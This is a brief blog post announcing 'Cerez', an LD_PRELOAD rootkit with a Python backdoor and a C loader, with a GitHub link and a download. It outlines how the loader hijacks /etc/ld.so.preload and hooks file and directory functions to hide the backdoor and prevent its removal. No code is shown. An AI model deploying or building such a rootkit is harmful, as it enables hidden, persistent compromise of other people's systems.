Cerez is a LD_PRELOAD

Posted on By Treadstone 71

Cerez is a LD_PRELOAD rootkit, it consists of two parts, a backdoor (written in python) and a loader (written in c).

Loader is a SO binary that gets installed into /lib and writes its path into /etc/ld.so.preload, this way every binary on the system preloads it.

By overwriting system functions like fopen, readdir, access and unlinkat it makes it nearly impossible to remove/detect the backdoor.

I also wrote a simple client that you can use to connect the backdoor.

Features:


✔ Hidden in the process list
✔ Hidden in the file system
✔ Unreadable
✔ Undeleteable
✔ Unwriteable

https://github.com/StayBeautiful-collab/cerez

cerez-mainDownload
ALL, hack, rootkit Tags:, ,

Related Posts

Copyright 2024

Discover more from The Cyber Shafarat -

Subscribe now to keep reading and get access to the full archive.

Continue reading